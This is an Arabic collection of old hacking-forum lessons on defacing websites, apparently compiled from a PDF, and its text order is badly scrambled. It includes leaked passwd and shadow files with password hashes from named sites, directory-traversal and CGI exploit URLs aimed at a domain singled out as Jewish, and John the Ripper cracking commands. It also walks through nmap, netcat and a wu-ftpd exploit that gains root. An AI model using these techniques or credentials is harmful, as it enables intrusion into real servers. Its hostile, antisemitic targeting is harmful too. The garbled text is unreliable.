‫‪ -3‬عمل جلسه للتقاط كل السكربتات ) ‪ ( Perl .......‫ما قلت هذا موقع يهودي وال بدمره وصلح عليهم عنتر ولد بو شداد ‪ ،‬أرسلت رساله لنقطه الضعف ‪،‬‬ ‫صلحت لها نسخ ولصق ‪ ،‬ورد علي بالشكر وقائمه بالغاني الجديده لديهم وأخذ فكره حسنه عن المسلمين‬ ‫وعن العرب بدل من فكره الرهاب اللي حكوماتهم تزرعها في عقولهم‬ ‫لنأخذ مثال ‪ :‬الموقع ‪ timduff./.com‬هذا موقع يستحق التدمير ‪ ،‬وقد تم ذلك ‪ ،‬وهو الن تم إرجاعه ولكن‬ ‫من جديد ول يحوي ال القليل من الصفحات ل تتجاوز إثنتان‬ ‫سمعت عن هذا الموقع في أحد منتديات الهاكرز النجليزيه بأنه يقدم خدمه ل أعلم ما هي بالضبط ‪ ،‬فذهبت‬ ‫للموقع لسجل واعرف ماهي ‪ ،‬كان التسجيل عن طريق إرسال معلومات الى بريد اللكتروني ارسلت‬ ‫معلومات ‪ ،‬وصلني الرد بعد ساعتين تقريبا ‪ ،‬كا كنت أن الرد يكون كله حش وسب ‪ ،‬ما كنت أقراء ال كلم‬ ‫كله حش وسب ‪ ،‬ليش ‪ ،‬تبين لي السبب هو ذكري كلمة ‪ ، i'm from saudi arabia‬ولكن لماذا كل هذا‬ ‫الحقد ‪ ،‬ومضت ايام وكل يوم والثاني أحقد عليه أكثر وأكثر عشان عنصريته ‪ ،‬ال أن توفقنا ولقينا لملقم‬ ‫الويب حقه نقطه ضعف في موقعي روسي ‪ ،‬وال الن غير مرقوعه ‪ ،‬تقدر تعرض كل الملفات الموجوده في‬ ‫السيرفر ‪ ،‬وتقدر تسحب منها كل ماتريد ‪ ،‬عن طريق اليو آر إل هذا‬ ‫عنوان الموقع وثم ‪ /.././..

‬وليس *‪ ، C.‫ويوجد نوع من الستثمارات ثاني وهو شفره )كود( مكتوب بلغه ‪ C‬المشهوره ‪ ،‬وهذا النوع غالبا ما تحدث‬ ‫فيه أخطأ أثناء عمليه الترجمه ‪ ،‬قد تواجه كثير من المتاعب لذلك يجب أن تكون لديك خلفيه في لغه سي ‪،‬‬ ‫ولترجمه هذا النوع عليك بالذهاب الى ليونكس وترجمته بإستخدام المترجم ‪gcc‬‬ ‫‪gcc Exploit.x Nobody:/:‬‬ ‫‪www:x:102:1001::/web:/bin/csh‬‬ ‫‪mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu‬‬ ‫‪sid:x:103:10::/export/home/sid:/bin/ksh‬‬ ‫‪mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh‬‬ ‫‪jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh‬‬ ‫‪198‬‬ .c -o Exploit‬‬ ‫ملحظه مهمه ) يجب أن يكون المتداد للمف *‪ c.‬لو كان حرف ‪ c‬كبتل فسوف يترجم‬ ‫الستثمار وكأنه كتب في سي ‪ ، ++‬الشئ الثاني تأكد من توفر المكتبات )*‪ (h...‬التي يتطلبها الستثمار قبل‬ ‫تشغيله(‬ ‫عليك زياره موقعي فهناك مستندات في البرمجه قد تنفعك‬ ‫يوجد نوع ظهر مؤخرا من الستثمارات وبداء ينتشر وهو أيضا شفره ولكن مكتوبه بلغه ‪ Perl‬ومن الممكن‬ ‫أن يتم تشغيل هذا النوع من موجه الدوس في ويندوز )يجب أن تملك برنامج يفسر شفرات البيرل مثل أكتيف‬ ‫بيرل(‬ ‫وأحيرا انواع نادره من الستثمارات قد تكون على شكل خطوات ‪.‬‬ ‫‪ = Exploit‬إستثمار‬ ‫ ماهو ملف كلمة المرور ‪ password file‬؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫ملف كلمة المرور معروف من إسمه ‪ ،‬هو الذي في داخله توجد حسابات الشخاص المرخص لهم بالدخول‬ ‫الى السيرفر ‪ ،‬مثل هذا‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫‪root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:‬‬ ‫‪sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬ ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬ ‫‪Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬ ‫‪Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network‬‬ ‫‪Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:‬‬ ‫‪noaccess:x:60002:60002:No Access User:/:‬‬ ‫‪nobody4:x:65534:65534:SunOS 4..

....‬‬ ‫كلمة المرور تكون مشفره ‪ ،‬ل هذا ليس صحيحا تماما ‪ ،‬كانت مشفره زمان ولكن في الوقت الحالي هي‬ ‫مضلله‬ ‫*او ‪ = x‬كلمة سر مضلله ‪Shadowed‬‬ ‫‪ = EpGw4GekZ1B9U‬كلمة سر مشفره على مقياس ‪ ، DES‬هذا النوع من التشفير المستخدم في‬ ‫ليونكس و ‪ FreeBSD‬وعدد من النظمه الخرى ضعيف ‪ ،‬وهو دائما مكون من ‪ 13‬حرف ورقم كبتل‬ ‫وسمول ول يحتوي من بينها على رمز ابدًا ‪ ،‬بإستثناء ويندوز فهو يستخدم نوع آخر من التشفير وهو نوع‬ ‫ضعيف أيضا‬ ‫ كيف يمكن معرفة كلمة السر من خلل ملف الباسورد ‪ password file‬؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫~~~~~~~~~~~~‬ ‫إضغط ‪ Ctrl + Shift‬في القسم اليمن من لوحه المفاتيح لتقراء من اليسار الى اليمين ‪ ،‬ثم إذهب الى‬ ‫العلى حيث وضعت مثال لملف كلمة مرور تم سحبه من الموقع ‪.‫‪landmark:x:1000:1000::/web/landmark:/bin/ksh‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫وقد تكون أكثر بكثير ‪ ،‬حيث أن هذا الملف الموضح بالعلى أختصر بشكل كبير ‪ ،‬فعند سحبه كان يحتوي على‬ ‫آللف السطور ‪ ،‬ليس كل ملفات كلمات المرور بهذا الحجم فيوجد منها من ل يتجاوز ‪ 10‬أسطر وهي‬ ‫الموجوده بكثره ‪ ،‬على العموم أنت الحين عليك تعرف بأن ملف كلمة المرور هو الذي في داخله توجد‬ ‫حسابات الشخاص المرخص لهم بالدخول الى السيرفر ‪.com‬‬ ‫تفسير هذا السطر ‪-:‬‬ ‫‪root:x:0:1:Super-User:/:/sbin/sh‬‬ ‫‪root‬‬ ‫هذا السطر يوضخ المستخدم واللي هو الجذر ‪root‬‬ ‫‪199‬‬ .....‬‬ ‫ بماذا يفيدني هذا الملف ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫يفيدك يا الحبيب في معرفه كلمات السر وإسماء المستخدمين لكي تقوم بإختراق الموقع ‪ ،‬ولكن لتفرح ‪!.. hwwilson.

.‬‬ ‫‪200‬‬ ....‫‪x‬‬ ‫وكلمة المرور ‪ ،‬ويتضح انها مضلله ‪ ،‬يعني مكانها العلمة ‪ ، x‬ل تفكر في كسرها فهذا مستحيل ‪ ،‬لكن عليك‬ ‫البحث عن ملف ثاني تم تخزين فيه كلمة المرور ‪ ،‬ستعرف بعد قليل كيف تفعل هذا‬ ‫‪0‬‬ ‫هذا هو رقم المستخدم‬ ‫‪1‬‬ ‫رقم المجموعه‬ ‫‪Super-User:/:/sbin/sh‬‬ ‫هذا مش مهم‬ ‫‪++++++++++++++++++++++++++++‬‬ ‫الجزء الثالث‬ ‫ ماالفرق بين إذا كان الملف )مشفر ‪ (encryption‬وإذا كان )مضلل ‪ (shadowed‬؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫~~~~~~~~~~~~~~~~~~~~~~‬ ‫الملف المضلل ‪ shadow file‬يكون مكان كلمة المرور رمز مثل * أو ‪ x‬أو ‪ #‬أو ! وهذا مثال لها‬ ‫‪root:x:0:1:Super-User:/:/sbin/sh‬‬ ‫لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه‬ ‫‪root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh‬‬ ‫هنا تكون كلمة المرور المشفره هي ‪Q71KBZlvYSnVw‬‬ ‫الن طلعت الصوره صافيه ‪.0a‬و ‪ john the ripper‬ويوجد آخر بإسم ‪jack the ripper‬‬ ‫‪ ،‬إذا كنت ممن يجيدون العمل في ليونكس فهذا جيد ‪ ،‬عليك تنزيل ‪ ، Crack 5a‬وأفضل ‪john the‬‬ ‫‪ ripper‬لمن يريد إستخدام ويندوز ‪ ،‬وللمعولميه فإن ‪ john the ripper‬عمل أيضا تحت ليونكس ‪.‬‬ ‫ وماذا لو كان ملف كلمة المرور مشفر ‪ ،‬كيف يتم كسره ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫~~‬ ‫البرامج كثيره وأشهرها هو ‪ Crack 5..‬‬ ‫طريقه عمل هذه البرامج ‪-:‬‬ ‫يقدم للبرنامج ‪ wordlist‬ويقوم بمطابقه الكلمات الموجوده به ‪ ،‬كما هو موضح هنا ‪...

.‫‪\ -----------------------------------------------------------------------------------------------‬‬‫‪------> Q2wrtUo9LPq2R‬‬ ‫يتم مقارنه | ‪} ---> //‬البدايه{ كلمة المرور | ‪ /---/‬المشفره مع | ‪ / 1 /‬أخذ كلمة من الـ ‪ wordlist‬الكلمات‬ ‫| ‪ _____________ / 0 /‬المختاره حتى | }تشفير{‪ | | / 1 /‬يتم ‪|----\ / 0 / ---------^--------‬‬ ‫‪ | word list‬التطابق ‪-> Q6LiJ6ct1oUBz‬كلمة مرور مشفره ‪ /---/‬الكلمة المختاره | |‬ ‫_____________| ‪ \ ------song--------// ------------------‬إذا حدث تطابق فهذا يعني أن‬ ‫كلمة المرور التي كانت مشفره‬ ‫قد كسرت ‪..C)Copyright Microsoft Corp 1981-1998‬‬ ‫‪E:\Desktop\junk\john the ripper>john -w asswd passwd.‬الخ حتى تصيب كلمة المرور الصحيحه ‪ ،‬وأنا افضل ان تستخدم ملفات ‪ wordlist‬فذلك لن يأخذ‬ ‫معك في ال ثواني فقط لن عمليه التجربه الموضحه في الرسم بالعلى ذكرت بأنه سرعة تجربه الكلمات‬ ‫يتجاوز ‪ 5000‬كلمة في الثانيه ‪ ،‬إذا لم تفلح ملفات ‪ wordlist‬حينها إذهب الى القوه العنيفه ‪brute‬‬ ‫‪force‬‬ ‫المر التالي يجعل ‪ john the ripper‬يستخدم طريقه ‪ brute force‬السابق ذكرها‬ ‫‪john -i passwd‬‬ ‫‪201‬‬ .txt‬‬ ‫‪by Sola 97.John the Ripper Version 1.‬‬ ‫| ‪ | -------------------------------------------------------------------------------‬ملحظه مهمه ‪ -:‬يتم‬ ‫عمل دوره مثل الموضحه في العلى لكسر كلمات المرور المشفره بسرعه‬ ‫}النهايه{ | ‪ 5000‬تجربه في الثانيه )إختبرنا ‪john the ripper‬على معالج بسرعه ‪(700‬‬ ‫| ‪-------------------------------------------------------------------------------‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫هذه الرسمه تعبت عليها عشان كذا ل أحد يسرقها‬ ‫لتشغيل ‪ john the ripper‬من واجه دوس نكتب المر التالي‬ ‫‪john -w:wordlist passwd‬‬ ‫حيث ‪ wordlist‬هو ملف القاموس الذي يحتوي على عدد كبير من الكلمات‬ ‫و ‪ passwd‬هو الملف الذي يحتوي على كلمات المرور المشفره والتي نود معرفتها‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫‪Microsoft(R) Windows 98‬‬ ‫‪).pot‬الموجود في نفس الدايروكتري ‪ ،‬وعليك حذف هذا الملف إذا‬ ‫أردت البدء في عمليه كسر جديده ويمكنك تغيير إسمه أو نقله في مكان آخر بدل من حذفه إذا كنت ترى‬ ‫ذلك ‪..‬‬ ‫هناك طريقه اخرى للكسر وهي تسمى بـ ‪ brute force‬أو بالعربي القوه العنيفه ‪ ،‬وهي ل تحتاج لملف‬ ‫‪ ، wordlist‬هي تقوم بتجربه كل الحروف والرقام والرموز مع بعض في خانتان و ‪3‬خانات واربع‬ ‫وخمس ‪..3 Copyright (c) 1996‬‬ ‫‪Loaded 1 password‬‬ ‫**‪v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE‬‬ ‫<‪E:\Desktop\junk\john the ripper‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫وسوف تحفظ النتيجه في الملف ‪ john.

‬‬ ‫ ولو كان ملف كلمة المرور مضلل ‪ ،‬ماذا علي ان أعمل ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫~‬ ‫دائما سوف تواجه كلمة مرور مضلله ‪ ،‬لكن هناك طريقه تسمى ‪ Unshadow‬لحل هذه المشكله !!‬ ‫إذا واجهت ملف مضلل عليك البحث عن ملف ثاني يسمى ملف الشادو )ملف الظل( ‪shadow file‬‬ ‫وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ‪ ،‬اليك الجدول التالي ‪:‬‬ ‫‪* = Linux : /etc/shadow token‬‬ ‫‪ = SunOS : /etc/shadow token‬يأخذ أشكال متعدده اشهرها هو *‬ ‫‪ * = FreeBSD : /etc/master.hwwilson...passwd or /etc/shadow token‬والجديد هو ‪x‬‬ ‫‪IRIX : /etc/shadow token = x‬‬ ‫‪! = AIX : /etc/security/passwd token‬‬ ‫‪* = ConvexOS : /etc/shadow or /etc/shadpw token‬‬ ‫‪ token‬تعني الرمز الذي يوجد في الملف ‪ ، passwd‬وهذا يفيد في تسهيل المهمه ‪ ،‬يعني لو مثل لقيت‬ ‫علمه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في ‪ ، etc/security/passwd/‬لقد‬ ‫إستعنت بالجدول السابق ذكره ‪ ،‬مثال على ملف شادو )أكرر ملف شادو هو الملف الذي تخزن فيه كلمة‬ ‫المرور الصحيحه(‬ ‫هذا ملف ‪shadow‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫‪::::::root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445‬‬ ‫‪adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::‬‬ ‫‪::::::lp:NP:6445‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫نلحظ ان كلمات السر موجوده‬ ‫الخطوه الخيره وهي دمج ملف الباسورد ‪ passwd file‬مع ‪ shadow passwd‬لنحصل على ملف‬ ‫متكامل ونقدمه الى برامج الكسر السابق ذكرها‪..com/etc/passwd‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫‪root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:‬‬ ‫‪sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬ ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬ ‫‪Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬ ‫‪Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network‬‬ ‫‪202‬‬ .‫حيث ‪ passwd‬هو ملف كلمة المرور المراد كسره ‪ ،‬إذا قمت بتجربه هذه الطريقه إضغط إنتر أثناء عمل‬ ‫البرنامج لترى الى أين توصل ‪.‬‬ ‫هذا ملف باسورد حصلنا عليه من ‪http://wilsonweb2..

html ‫أرشيف لثغرات‬ /http://www.com 203 .com/exploits/archive.x Nobody www:x:102:1001::/web:/bin/csh mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu sid:x:103:10::/export/home/sid:/bin/ksh mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh landmark:x:1000:1000::/web/landmark:/bin/ksh -----------------------------------------------------------------------------------------------‫ نعرف من خلل الجدول السابق ذكره بأن كلمة المرور الصحيحه في‬x ‫ الموضح واللي هو‬token ‫ومن الـ‬ etc/shadow/ ‫الدليل‬ ‫إذن نتوجه بالمتصفح الى‬ http://wilsonweb2.5kwGw1MY:10911:::::: sid:stXldZKnujFYo:10515:::::: mirror:iMPWwbrU.Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: :/:nobody4:x:65534:65534:SunOS 4.ussrback.securiteam..gB4k:10601:::::: admin:hDhB5YYKyWgQw:10976:::::: jerome:XDqnOl32tPoGo:10976:::::: ::::::erl:0jE9Xem4aJYeI:10982:::::: landmark:0jCgWu6vl8g0s:11185 -----------------------------------------------------------------------------------------------‫ وهكذا مع جميع الحسابات‬، ‫ في ملف الباسورد‬x ‫نقوم بنسخ كلمات السر الموجوده فيه ولصقها مكان علمه‬ ‫لنحصل على ملف لمة مرور كامل ومتكامل ونقدمه الى برامج الكسر‬ -: ‫ملحظه مهمه‬ .secureroot.hwwilson.com/etc/shadow ‫لنحصل على الملف‬ -----------------------------------------------------------------------------------------------root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: smtp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445:::::: www:WJctaI..com ‫ الكثير‬+ ‫أرشيف ثغرات‬ /http://www.8rcSe2:10507:::::: mirrors:gg9p. ‫ يعني تربتها لتتعرف عليها برامج الكسر‬، ‫عليك جعل كل حساب في سطر‬ -: ‫مواقع تستحق الزياره‬ ‫أرشيف لثغرات‬ www.

warez.secureroot.com insecure /http://www.rootshell.hitboss.org <XMP></BODY></HTML/> http://public.pl ،،،‫انتهى‬ " (‫" اختراق المواقع )الجزء الثالث‬ 204 .asp Warez.ussrback.insecure.com/category/exploits ‫دليل لمواقع الهاكينق‬ www...sk Security Search Engine /http://www.undergroundnews.com-Underground /http://www.box.www.ail/formmail.uk/cgi.com ‫أرشيف ثغرات‬ /http://www.easynet.ound/search.neworder.co.com ‫مواقع لثغرات‬ www.com Hacking (‫(ممتاز لمن يريد البدايه‬ /http://www.com/resources/s.‫أرشيف ثغرات‬ /http://www.bugs2k...com/Hacking ‫محرك بحث ل غني عنه‬ www.

‬وبسيط جدا جدا لنه من صنع البشر‬ ‫كوني احد العضاء في هذا المنتدى وجديد في باب الختراق عن طريق الثغرات‬ ‫وحتى تحصل الفائده للجميع ونتعلم من بعض ‪.‬‬ ‫من خلل قرائتي للعديد من تكست الثغرات رغم قدامتها تبين لي عدة امور‬ ‫* لن تخترق الموقع )‪ (host‬اللي مستضيفه السيرفر حتى تمتلك اليوزر والباسوور وهذا شيء طبيعي‬ ‫* لن تخترق السيرفر حتى تمتلك ملف الصلحيات )‪ (passwd‬اللي هو حق الحسابات للمواقع المستأجره‬ ‫عند السيرفر بس سؤالي اللي محيرني ان الملف واقع تحت مجلد اسمه اي تي سي ‪/etc/passwd‬‬ ‫احيان يكون اسمه ‪ shadow‬ويعني ان كلمة المرور نجمه او اكس او علمة تعجب اما ‪ passwd‬فتأتي‬ ‫فيه‬ ‫الكلمه مشفره وتستخدم لها ‪ john the ripper‬اللي يفك تشفيرها طبعا ملفات الشادو مالك امل للحين‬ ‫على حسب علمي مافيه برنامج لها ؟؟؟‬ ‫فيه سؤال هنا اللي نعرفه ان كل ملف له امتداد بس ليش الملف ذا ماله امتداد ؟‬ ‫واذا حصلت الملف باي طريقه كانت ؟؟ باي صيغه احفظه هل يحفظ كتكست ام )‪ (pwd‬او )اي صيغه( ؟‬ ‫بعدين فيه سؤال ثاني المجلد اللي فيه الملف من مجلدات اليونكس ؟ لنه كما معروف ان اليونكس‬ ‫له ست مجلدات‬ ‫‪ bin‬خاص بالملفات الثنائيه يعني اللي تشغل النظام‬ ‫‪ etc‬ملفات ادارة النظام ومن ظمنها الرووت اللي هو حساب مدير النظام او ‪passwd‬‬ ‫‪ dev‬ملفات الجهزه‬ ‫‪ lib‬مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل‬ ‫‪ tmp‬الملفات الموقته او غير الثابته‬ ‫‪ usr‬اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام‬ ‫هل يعني ذلك لو ان السيرفر فيه نظام ‪ nt‬اقدر انزل الملف منه ؟ وان المجلدات نفسها اللي باليونكس‬ ‫‪205‬‬ ..‬فليس عيبا طلب العلم‬ ‫انما العيب الجهل والتعالي بالعلم نحن نتعلم ل لنجابه العلماء بل‬ ‫لننفع امتنا ونرفع رايتها ونقف في وجه من يعاديها ‪..........‬‬ ‫في الحقيقه موضوع الثغرات بسيط جدا مثل ما انا قريت عنه بس‬ ‫يبي متابعه وشوية جهد انا ساطرح بعض السئله لعل الخوان المشرفين‬ ‫او الكتاب يساعدونا في الموضوع ‪.‫>ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة<‬ ‫اخواني عالم الختراق كبير جدا ‪.

‬‬ ‫انتهى‪،،،‬‬ ‫" درس في اختراق المواقع )متوسط( "‬ ‫‪206‬‬ .jewish.org‬نفعل التالي‬ ‫‪ /http://www.org/cgi-bin/php.cgi‬بحيث تصبح الخطوات بعد‬ ‫تجميعها‬ ‫‪ http://www.org‬ثم نكتب ‪ /cgi-bin‬ثم الثغره ‪ php.‫زي اللي موجوده في ‪ nt‬ام تختلف واسم الملف يختلف ‪ admin.jewish.cgi‬ونريد‬ ‫تطبيقها على موقع ذو دومين نيم يعني مو مستضاف مثل ‪ /http://www.cgi‬‬ ‫‪ scripts‬خاص بسيرفرات فيها ‪winnt‬‬ ‫‪ cgi-bin‬خاص بسيرفرات يونيكس او ايريس او لينكس‬ ‫للمعلوميه المجلدات السابقه توضع فيها الملفات التنفيذبه من جهة السيرفر مثل البلت جافا‬ ‫اما ملفات السكربت جافا تنفذ على جهازك مثل اللي تطلع في المستعرض‪.pwd‬مثل‬ ‫* بالنسبه لطريقة الثغرات تعني الطرق للوصول للملفات السابقه او ملفات اخرى‬ ‫ومن اشهرها ثغرات السي جي اي نسبة للمجلد ‪ cgi-bin‬او ملفات من امتداد ‪cgi‬‬ ‫ماعلينا ليش سموها ؟؟؟‬ ‫طيب وشلون نتعامل مع الثغره والموقع ببساطه شديده لنفترض ان لدينا ثغره ‪ php.org/scripts/php.cgi‬الكلم هذا كله في المستعرض عندك في حقل‬ ‫الدرس العنوان‬ ‫انا نسيت اقول حاجه ماني متأكد منها لعل من يعلق على الموضوع ان كانت غير صحيحه يصححها‬ ‫ان ممكن تكون الثغره بمجلد ثاني اسمه ‪ scripts‬وتصبح الثغره السابقه‬ ‫‪http://www.jewish.jewish.

slackware. dig. traceroute.target..org‬‬ ‫‪(/c) NetCat (http://www.2.org/nmap‬‬ ‫‪:(Interesting ports on www..target.insecure.3‬‬ ‫)‪(The 1531 ports scanned but not shown below are in state: closed‬‬ ‫‪207‬‬ .‬‬ ‫‪ -2‬اداه ال ‪ nmap‬هي عباره عن بورت سكانر متقدم‬ ‫‪ -3‬ال ‪ NetCat‬هي اداه شبيه بالتلنت و تقوم برفع بيانات لسيرفير معين‬ ‫‪-4‬الكسبلويتات هي عباره عن برامج غالبا تكون مكتوبه بلغه السي و هي تقوم‬ ‫باعطائك كافه الصلحيات فهي تخترق جهاز معين و تقوم بعمل كل شيء انت تريده‬ ‫ممكن تلقيها فين؟؟؟‬ ‫مواقع السيكيوريتي على افه من يشيل‪.‬‬ ‫‪www.3‬‬ ‫‪ -5‬شوف الخدمات اللي بيقدمها الموقع و كمان شوف نظام التشغيل متبعا التالي ‪-:‬‬ ‫"‪"nmap -sS -O 196.com (196.insecure.target.telnet.‬يا عم ركب لينكس و ريح نفسك (‬ ‫و طبعا الدوات دي ‪ nmap and netcat‬و اخر حاجه هي الكسبلويت ‪..2.‫>ةةةةة<‬ ‫>ةةةةةة‪< ICER :‬‬ ‫الدوات المطلوبه ‪ :‬شيل اكاونت ‪.1.. 2..3‬‬ ‫‪( /Starting nmap V.com‬‬ ‫‪(b) Nmap (http://www.com/~weld/netcat‬‬ ‫الخطوات ‪-:‬‬ ‫‪ -1‬ركب الينكس و خش عالنت )مش قلتلك مفيش احسن من اللينكس ‪( P:‬‬ ‫‪ -2‬ركب الداه ‪ nmap‬متبعا التالي ‪:‬‬ ‫*‪tar zxvf nmap..54BETA22 ( www.1. ping. ssh.‬في ناس تانيه ماتحبش اللينكس فالشيل اكاونت كويس لها و ممكن يمشي‬ ‫انا عن نفسي مش حاستعمل التنين ‪(:‬‬ ‫بس بالنسبه للي حيستعملو الشيل لزم يتاكدو انه بيسمح بالبرامج الساسيه زي‬ ‫‪nslookup.‬‬ ‫*المواقع المرتبطه بالموضوع ‪:‬‬ ‫‪(a) Linux (http://www.‬مش حناقش كيفيه‬ ‫الحصول على واحد لن فيه مواضيع كثيره اتكلمت عليه‪..2..gz (1‬‬ ‫‪cd nmap (2‬‬ ‫‪configure && make && make install/.‬دور و لو مالقيتش قولي و انا اديلك كام موقع‬ ‫تجيب منه الحاجات دي‪..2.1. (3‬‬ ‫‪-3‬شوف الموقع المستهدف و ليكن ‪.‬اذا بحثت في جوجل سوف تجد الكثير من الشيلز‬ ‫طبعا الناس المحترمه )احمممم( بتركب لينكس او يونيكس و تعيش حياتها و تريح‬ ‫نفسها‪.com‬‬ ‫هذا سوف يعرض لك الي بي للموقع و ليكن ‪196.‬‬ ‫*بعض الملحوظات الهامه ‪:‬‬ ‫‪-1‬الشيل اكاونت شبيه جدا بالدوس مع اختلف في الوامر و الوظائف ‪..com‬‬ ‫‪ -4‬شوف الي بي تبع الموقع باستخدام‬ ‫‪nslookup www.. host.tar..l0pht. ftp‬‬ ‫و اساسي لزم ال ‪ gcc‬عشان تعرف تعمل كومبايل‪).1.3‬‬ ‫المفروض انه يديك مخرجات شبه الكلم ده ‪-:‬‬ ‫‪root@IcEr:~# nmap -sS -O 196..

2.Connected to 196. send your complete e-mail address as password 331 :Password Welcome.pandora.‫الكلم ده كله عباره عن استكشاف للموقع يوريك البورتات المفتوحه‬ daemon ‫شغال على الموقع و ل ل في المثال اللي فوق حنلقيه موجود و ده كويس‬ -: ‫ موجوده متبعا التالي‬FTP daemon ‫شوف اي فيرحين من‬ "telnet 196.0(1) Mon Mar 6 13:54:16 220 (SAST 2000 .16 (Uptime 0.3 21" ‫او‬ "ftp 196.Port State Service tcp open ftp/21 tcp open smtp/25 tcp open http/80 tcp open sunrpc/111 tcp open auth/113 tcp open printer/515 tcp open unknown/963 tcp open kdm/1024 tcp filtered krb524/4444 tcp open X11/6000 tcp filtered napster/6699 OS guess for host: Linux 2.2.target. please try using a dash (-) as the first-230 character of your password -.‫نكمل‬ FTP ‫ممكن تشوف لو كان فيه‬.1.2.ready Name (target:root): anonymous .160 days (since Mon Apr 30 14:51:06 2001 Nmap run completed -.this will turn off the continuation messages that-230 may .2.3" ‫اي منهم حيديك بانر فيه الفيرجين بتاعه الف تي بي ديمون اللي شغاله على السيرفير‬ : ‫ممكن يكون زي كده‬ root@IcEr:~# ftp 196.1.3 .1 IP address (1 host up) scanned in 67 seconds #~:root@IcEr (: ‫تمام كده يا شباب‬ .2.6.14-2.be confusing your ftp client-230 -230 208 . archive user! This is an experimental FTP server. If have-230 any unusual problems.Guest login ok.com FTP server (Version wu-2.net If you do have problems...2.3 www.1.1. please report them via e-mail to-230 root@IcEr..

04 STEP 3 : Checking if we can reach our return address by format string (STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now .2.2. ‫ الموجوده‬annonymous ‫لو لحظت اننا استغلينا خاصيه ال‬ 209 . root@IcEr:~/# .. AddrRetAddr: 0xbfffb028.2 (?) with wuftpd 2. ‫اه نسيت‬..6.Remote system type is UNIX .2.U will find what U wanna .1. ‫طيب‬ ‫لكن لو كانت الخاصيه‬. magic number already exists: [[87.01:02..Guest login ok. ‫محدش سالني اعمل بالنت كات بعد كده‬...14-5.net 2. send your complete e-mail address as password 331 <PASS <shellcode Next time please use your e-mail address as your password-230 for example: icer@ae..01:03.STEP 5 : Sending code.za..c ‫و لتكن‬ red hat 6. Shellcode: 152 . access restrictions apply 230 STEP 2 : Skipping.. ‫و هوه حيديلك معلومات كامله عن امر الكومبايل‬ (: ‫كده يبقى انا كده عملت اللي عليه‬ ‫محدش يسالني باه بعد كده و يقولي ياواد يا ايسر اعمل ايه‬ search.FTPd ‫احصل على الكسبلويت بتاعه الفيرجين ديه من‬ ( ‫)اللي يعمل سيرش ميتوهش‬ wuftpd2600.0(1) from rpm Return Address: 0x08075844.net -230 . access restrictions apply 230 .3 (ftp/<shellcode>): RedHat 6..Guest login ok.1. ‫ و كانت اعمليه ناجحه‬anonymous ‫و ايضا احنا حاولنا نخش كمجهولين‬ ####### ‫ صلي على الحبيب المختار‬####### -: ‫ مش فاكر المهم انها اهم خطوه‬8 ‫ او‬7 .3 Target: 196.6.Using binary mode to transfer files ftp>by #~:root@IcEr .02:01.wu-2.2 ‫المهم لو شفت السورس كود بتاعها حتلقي انها متكوده عشان نظام تشغيل معين و ليكن‬ ‫و يا سلم لو كان الموقع المستهدف بيعمل على نظام التشغيل ده‬ ‫كده يبقى كل اللي تعمله انك تعمل كومبايل للثغره دي و بشغلها على سيرفر‬ root access ‫الموقع المستهدف و كده حيديك‬ (-.0 #1 